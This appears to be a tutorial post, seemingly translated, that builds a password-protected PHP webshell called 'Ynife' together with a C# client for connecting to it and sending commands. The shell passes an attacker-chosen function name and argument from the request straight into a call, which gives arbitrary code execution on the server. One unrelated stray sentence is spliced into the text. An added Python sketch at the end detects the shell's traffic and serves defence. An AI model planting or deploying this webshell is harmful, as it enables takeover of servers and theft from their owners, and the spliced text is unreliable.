webshell:
<?php
@ini_set('display_errors','0');
if($_REQUEST['Ynife_verify'] == "verity" && $_REQUEST['Ynife_password'] == "pass"){
    echo "bingo";
}
if($_REQUEST['Ynife_password'] == "pass" && $_REQUEST['Ynife_verify'] == "run"){
    if($_REQUEST['Ynife_run_flag'] == "run"){
        loader($_REQUEST['loader'],$_REQUEST['Ynife_run_loader']);
    }else{
        loader($_REQUEST['Ynife_run_loader'],$_REQUEST['Ynife_run']);
    }
}
function loader($a,$b){
    $cc = run($b);
    $a($cc);
}
function run($b){
    return $b;
}
?>
He told me to go ask a girl out. So I went...
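First, look at how the webshell decides whether the connection succeeded: when $_REQUEST['Ynife_verify'] is verity and $_REQUEST['Ynife_password'] equals pass, it echoes bingo. Experienced readers will probably roast me at this point, hahaha, and I think so too. It will be reworked later, so for now I am making do with this to test the waters.
Now back to the C# entry function.
Program.cs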
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Ynife
{
    internal class Program
    {
        static void Main(string[] args)
        {
            string url = args[0];
            string password = args[1];
            string res = SendData.PostRequest(url, password);
            if (res == "bingo")
            {
                Console.WriteLine("[+]connect success");
                SendExecuteCommand.SendCode(url, password);
            }
            else
            {
                Console.WriteLine("[-]connect failed");
            }
        }
    }
}
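It first takes the URL and the password from the console; the password is simply the value of $_REQUEST['Ynife_password']. Both are then sent through the PostRequest method of the SendData class. Follow into the PostRequest method.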
public static string PostRequest(string url,string password)
{
    string responseData = "";
    var client = new WebClient();
    WebProxy proxy = new WebProxy("127.0.0.1", 8080);
    client.Proxy = proxy;
    var data = new NameValueCollection();
    data["Ynife_password"] = password;
    data["Ynife_verify"] = "verity";
    byte[] sendData = Encoding.GetEncoding("GB2312").GetBytes(data.ToString());
    client.Headers.Add("ContentLength", sendData.Length.ToString());
    byte[] bytes = client.UploadValues(url, "POST", data);
    responseData = Encoding.UTF8.GetString(bytes);
    return responseData;
}
A proxy on port 8080 is enabled for local testing; if you do not use one, just turn it off.
Test the connection.
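The handshake described above (fixed `Ynife_` parameter names, a `verity` check, and a bare `bingo` reply) is easy to spot in captured HTTP traffic. The following detection sketch is an added example, not code from the original post; the transaction schema (`path`, `query`, `body`, `response`) and the sample records are constructed assumptions.

```python
from urllib.parse import parse_qs

# Indicators taken from the webshell and client code on this page.
PREFIX = "Ynife_"
SUCCESS_BODY = "bingo"

def request_params(tx):
    """Merge query-string and form-body parameters the way PHP's $_REQUEST
    does with request_order "GP": POST overrides GET, and the last
    occurrence of a repeated name wins."""
    merged = {}
    for raw in (tx.get("query", ""), tx.get("body", "")):
        for name, values in parse_qs(raw, keep_blank_values=True).items():
            merged[name] = values[-1]
    return merged

def classify(tx):
    """Return a finding label for one transaction, or None if it is clean."""
    params = request_params(tx)
    if not any(name.startswith(PREFIX) for name in params):
        return None
    verify = params.get("Ynife_verify")
    if verify == "verity":
        # The shell replies with the bare string only when the password matched.
        if tx.get("response", "").strip() == SUCCESS_BODY:
            return "handshake-confirmed"
        return "handshake-attempt"
    if verify == "run":
        return "execution-request"
    return "ynife-parameter"

def scan(transactions):
    """Return (index, path, label) for every suspicious transaction."""
    findings = []
    for i, tx in enumerate(transactions):
        label = classify(tx)
        if label:
            findings.append((i, tx.get("path", ""), label))
    return findings

# Constructed sample transactions (hypothetical schema, not real traffic).
SAMPLES = [
    {"path": "/index.php", "query": "page=2", "body": "", "response": "<html>"},
    {"path": "/up/a.php", "query": "", "body": "Ynife_password=guess&Ynife_verify=verity", "response": ""},
    {"path": "/up/a.php", "query": "", "body": "Ynife_password=x&Ynife_verify=verity", "response": "bingo"},
    {"path": "/up/a.php", "query": "Ynife_verify=verity", "body": "Ynife_verify=run&Ynife_password=x", "response": "..."},
]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

A `handshake-confirmed` finding means the file at that path answered as the shell does and should be treated as a live compromise; `handshake-attempt` indicates probing or a wrong password.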